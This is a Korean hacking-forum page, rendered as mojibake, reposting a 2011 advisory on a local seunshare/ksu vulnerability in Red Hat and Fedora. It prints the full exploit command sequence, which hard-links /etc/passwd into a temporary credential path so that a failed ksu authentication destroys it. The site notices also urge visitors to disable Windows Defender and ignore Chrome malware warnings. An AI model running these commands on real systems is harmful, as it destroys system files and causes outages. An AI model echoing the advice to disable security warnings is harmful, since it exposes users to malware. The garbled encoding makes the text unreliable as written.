ÇØÄ¿Áî´º½º / ÇØÄ¿´ëÇÐ

Donation bitcoin(±âºÎ¿ë ºñÆ®ÄÚÀÎ ÁÖ¼Ò)

¡¡
1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4
¡¡
±âºÎÇϽŠºñÆ®ÄÚÀÎÀº "º¸¾È Ãë¾à °èÃþ"À» À§ÇØ »ç¿ëµÇ°í ÀÖ½À´Ï´Ù.
¡¡
¡¡

Donation bitcoin(±âºÎ¿ë ºñÆ®ÄÚÀÎ ÁÖ¼Ò)

¡¡
1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4
¡¡
±âºÎÇϽŠºñÆ®ÄÚÀÎÀº "º¸¾È Ãë¾à °èÃþ"À» À§ÇØ »ç¿ëµÇ°í ÀÖ½À´Ï´Ù.
¡¡

°øÁö

¡¡

1. MS ¿§Áö ºê¶ó¿ìÀú¿¡¼­ÀÇ °æ°íâÀº 'À©µµ¿ì µðÆæ´õ'¸¦ ²ô½Ã¸é µË´Ï´Ù.

             'À©µµ¿ì µðÆæ´õ ²ô±â'

2. Å©·Ò ºê¶ó¿ìÀú·Î Á¢¼Ó½Ã ³ª¿À´Â ¾Ç¼ºÄÚµå °æ°íâÀº ±¸±Û Å©·ÒÀÇ ¿¡·¯, Áï ¿ÀŽ(ŽÁö ¿À·ù)À̹ǷΠ¹«½ÃÇÏ½Ã¸é µË´Ï´Ù.

3. ÀÌ »çÀÌÆ®´Â ¾ÈÀüÇÏ¸ç ±ú²ýÇÏ´Ù´Â °ÍÀ» ¾Ë·Á µå¸³´Ï´Ù.

4. ¹«°íÇÑ »çÀÌÆ®µé¿¡ ´ëÇÑ °ø·æ ±â¾÷ ºê¶ó¿ìÀúµéÀÇ ¹«Â÷º°ÀûÀÎ 'ŽÁö ¿À·ù ȾÆ÷'°¡ »ç¿ëÀÚµéÀÇ Á¤º¸ °øÀ¯ÀÇ ÀÚÀ¯¸¦ ħÇØÇÏ°í ÀÖ½À´Ï´Ù. ÀÌ¿¡ ´ëÀÀÇÏ¿© ÀÌ ±â¾÷µéÀ» »ó´ë·Î ¼Ò¼ÛÀ» ÁغñÇÏ°í ÀÖ½À´Ï´Ù.

¡¡

  ¢Æ   [ÇØÄ¿´ëÇÐ - hackers college]   ¢Æ  

ÀÛ¼ºÀÚ: ÇØÄ¿Áî´º½º
À帣: ÀÚ·á
2011/2/25(±Ý)
Á¶È¸: 1393
5736.zip (2KB, DN:57)
·¹µåÇÞ/Æäµµ¶ó °ø°Ý±â¹ý ¹ßÇ¥!  
¸íĪ : ·¹µåÇÞ °ø°Ý
¹ß·ÉÀϽà : 2¿ù24ÀÏ
ÇØ´ç½Ã½ºÅÛ : ·¹µåÇÞ
À§Çèµµ : »ó
ÄÚµå ÀÛ¼ºÀÚ : Tavis Ormandy
¡á °ø°Ý¿ë ¼Ò½ºÄÚµå Á¦¸ñ
·¹µåÇÞ °ø°Ý


¡á ¹ßÇ¥³¯Â¥
2011.02.24


¡á ÇØ´ç ½Ã½ºÅÛ
·¹µåÇÞ


¡á °ø°ÝÀ¯Çü
·ÎÄÃ


¡á À§Çèµµ
»ó


¡á ÃÖÃʺ¸°íÀÚ
Tavis Ormandy


¡á ¹®Á¦Á¡
·¹µåÇÞ ¿£ÅÍÇÁ¶óÀÌÁî°ú Æäµµ¶ó ÃֽŠ¹öÀüÀº seunshare ±â´ÉÀ» Á¦°øÇÏ°í ÀÖ´Ù. ¶ÇÇÑ policycore-utils ÀÇ setuid root À¯Æ¿¸®Æ¼´Â »õ·Î¿î ÆÄÀϽýºÅÛÀ» ¸¸µé±â À§ÇÑ ±â´ÉÀ» Á¦°øÇÑ´Ù.

ÀÌ·¯ÇÑ µµ±¸µéÀÇ ¿ëµµ´Â sandboxed processes ¸¦ À§Çؼ­ /home ¿Í /tmp ¿¡ »õ·Î¿î Àӽà µð·ºÅ丮¸¦ ¸¶¿îÆ®ÇÏ¿© ±ÇÇÑÀÌ ¾ø´Â »ç¿ëÀڵ鿡°Ô Á¢±Ù¼ºÀ» ÁÖ±â À§ÇÏ¿© °³¹ßµÈ °ÍÀÌ´Ù.

±×·¸°ÔÇÔÀ¸·Î½á ¿À¸®Áö³Î µð·ºÅ丮¸¦ ¹æ¾îÇÏ°í ·çÆ® °ø°ÝÀ¸·Î ºÎÅÍ º¸¾È¼ºÀ» À¯ÁöÇϱâ À§ÇÑ °ÍÀÌ´Ù.

±×·±µ¥ ÀÌ·¯ÇÑ ±â´ÉµéÀÌ ÀÛµ¿µÉ ¶§ ¿¹±âÄ¡ ¾ÊÀº »óȲÀÌ unprivileged  processes ¿¡¼­ ¹ß»ýÀ» ÇÏ´Â °ÍÀÌ ¹ß°ßµÇ¾ú´Âµ¥, ±×°ÍÀº ¹Ù·Î setuid ÀÀ¿ëÇÁ·Î±×·¥µéÀÌ /tmp ¿Í /home ¸¦ ¾î¶»°Ô ó¸®ÇÏ´Â Áö¸¦ º¯°æÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡ÀÎ °ÍÀÌ´Ù.

ÀÌ·¸°Ô ¹ß»ýÇÑ Ãë¾àÁ¡¿¡ ´ëÇÑ °ø°ÝÀº ±ÇÇÑÀÌ ¾ø´Â »ç¿ëÀÚµéÀÌ ½Ã½ºÅÛ³»ÀÇ /tmp µð·ºÅ丮ÀÇ ½ºÆ¼Å° ºñÆ®¸¦ È¿°úÀûÀ¸·Î Á¦°ÅÇÔÀ¸·Î½á ·¹µåÇÞ ½Ã½ºÅÛÀÇ /tmp µð·ºÅ丮´Â ´õ ÀÌ»ó ¾ÈÀüÇÑ °ÍÀÌ µÇÁö ¸øÇÏ´Â °ÍÀÌ´Ù.

´ÙÀ½ÀÇ °£´ÜÇÑ ¿¹Á¦´Â ÀÌ °ø°ÝÀ» ÀÌ¿ëÇÏ¿© ½Ã½ºÅÛÀ» ºØ±«½ÃÅ°´Â °úÁ¤À» º¸¿©ÁÖ°í ÀÖ´Ù.

¿©±â¼­ krb5 ¹èÆ÷ÆÇÀÇ ksu ´Â ´õ ÀÌ»ó ¾ÈÀüÇÏÁö ¸øÇÏ°Ô µÈ´Ù. ksu ´Â /tmp ¿¡ ÀÓ½ÃÆÄÀÏÀ» »ý¼ºÇÏ°Ô µÇ¸ç, ÀÎÁõÀÌ ½ÇÆзΠ³¡³ª¸é ¹Ù·Î Ŭ¸®¾î(clear) ÇÏ°Ô µÈ´Ù.

ÀÌ°ÍÀº ÀϹÝÀûÀ¸·Î /tmp µð·ºÅ丮°¡ ½ºÆ¼Å° ºñÆ®·Î º¸È£µÇ±â ¶§¹®¿¡ ¾ÈÀüÇÏ°Ô ÁøÇàµÇ´Âµ¥, seuhshare ¸¦ »ç¿ëÇÏ¿© ÀÌ °úÁ¤À» ¹æÇØÇÒ ¼ö°¡ ÀÖ´Â °ÍÀÌ´Ù.

# ¿ì¸®°¡ Á¶Á¤ÇÒ »õ·Î¿î µð·ºÅ丮¸¦ »ý¼ºÇÑ´Ù.

$ mkdir /tmp/seunshare  

 

# /tmp ¿Í /home ¿¡ ¸¶¿îÆ®Çϱâ À§ÇØ seunshare ¸¦ »ç¿ëÇϸç setuid ·çÆ® ¹ÙÀ̳ʸ®¸¦ ½ÇÇàÇÑ´Ù.

$ seunshare -v -t /tmp/seunshare/ -h /tmp/seunshare/ -- `which ksu` root &>/dev/null &  

[1]+  Stopped                 seunshare -v -t /tmp/seunshare/ -h /tmp/seunshare/ -- `which ksu` root  

 

# /proc ÀÎÅÍÆäÀ̽º¸¦ ÀÌ¿ëÇÏ¿© ¸¶¿îÆ®ÀÇ ÁøÇà°úÁ¤À» ÁöÄѺ»´Ù.

$ grep /tmp /proc/$(pidof ksu)/mountinfo  

66 64 1:1 /tmp/seunshare /tmp  

 

# ÀÎÁõ½Ã ksu ¿¡ ÀÇÇØ »ý¼ºµÈ ÀÓ½ÃÆÄÀÏÀ» È®ÀÎÇÑ´Ù.

$ ls -l /tmp/seunshare/  

total 4.0K  

-rw-------. 1 root taviso 35 Feb 18 23:21 krb5cc_0.1  

 

# µð·ºÅ丮¸¦ ¼ÒÀ¯ÇÏ¿© ½ºÆ¼Å° ºñÆ®¸¦ ¼ÂÆÃÇÏÁö ¾ÊÀ½À¸·Î unlink ÆÄÀϵµ Á¢±ÙÀÌ µÇÁö ¾Ê´Â´Ù.

$ rm -f /tmp/seunshare/krb5cc_0.1  

 

# ÆÄÀÏÀ» link ·Î ´ëüÇÑ´Ù.

$ ln /etc/passwd /tmp/seunshare/krb5cc_0.1  

 

# ksu ÀÎÁõ½ÇÆи¦ ¸¸µç´Ù.  

$ fg  

seunshare -v -t /tmp/seunshare/ -h /tmp/seunshare/ -- `which ksu` root  

 

°á°úÀûÀ¸·Î /etc/passwd °¡ ÇÇÇظ¦ ÀÔ°Ô µÇ¸ç ½Ã½ºÅÛÀº ´Ù¿îµÇ¾î ¹ö¸°´Ù.


¡á °ø°Ý¹ý / °ø°Ý¿ë ¼Ò½ºÄÚµå
the stickiness of /tmp on Red Hat Linux

- PoC ´Â À§ÀÇ ¸µÅ©¸¦ Ŭ¸¯ÇØ ÁÖ¼¼¿ä ^^


  À̸§   ¸ÞÀÏ   °ü¸®ÀÚ±ÇÇÑÀÓ
  ³»¿ë ÀÔ·Ââ Å©°Ô
                    ´äº¯/°ü·Ã ¾²±â Æû¸ÞÀÏ ¹ß¼Û ¼öÁ¤/»èÁ¦     ÀÌÀü±Û ´ÙÀ½±Û    
¹øÈ£À帣Á¦ ¸ñÀÛ¼ºÀÏ
1369 »çÁø    ±èÄ¡Åë Æ©´× ÄÄÇ»ÅÍ 2011/02/27
1368 ¾È³»    ¿À´Ã ÇØÅ· ¼¼¹Ì³ª ¿À½Ã´Â ±æ^^ 2011/02/26
1367 ÀÚ·á    ·¹µåÇÞ/Æäµµ¶ó °ø°Ý±â¹ý ¹ßÇ¥! 2011/02/25
1366 ¾È³»    Á¦ 2ȸ ÇØÅ· ¹®Á¦ Ç®ÀÌ ´ëȸ ¾È³» 2011/02/24
1365 ¾È³»    Á¦46Â÷ º¸¾È.ÇØÅ· ¼¼¹Ì³ª - 2¿ù26ÀÏ(Åä) 2011/02/23
1364 ¾È³»    ÇØÄ¿´ëÇÐ Á¦46Â÷ º¸¾È.ÇØÅ· ¼¼¹Ì³ª - 2¿ù26ÀÏ(Åä) 2011/02/22
1363 ¾È³»    ÇØÄ¿´ëÇÐ Á¦2ȸ À¥ÇØÅ· ´ëȸ-4¿ù16ÀÏ 2011/02/21
1362 ¾È³»    ÇØÄ¿´ëÇÐ Á¦1ȸ À¥ÇØÅ· ´ëȸ ¿ì½ÂÀÚ 2011/02/20
1361 ¾È³»    ³»ÀÏ 19ÀÏ(Åä) À¥ÇØÅ· ´ëȸ´Â ´ÙÀ½°ú °°ÀÌ ÁøÇàµË´Ï´Ù. 2011/02/19
1360 »çÁø    USB! ¾î¶»°Ôµç ¿¬°áÇÑ´Ù! 2011/02/18

 
¸ñ·Ï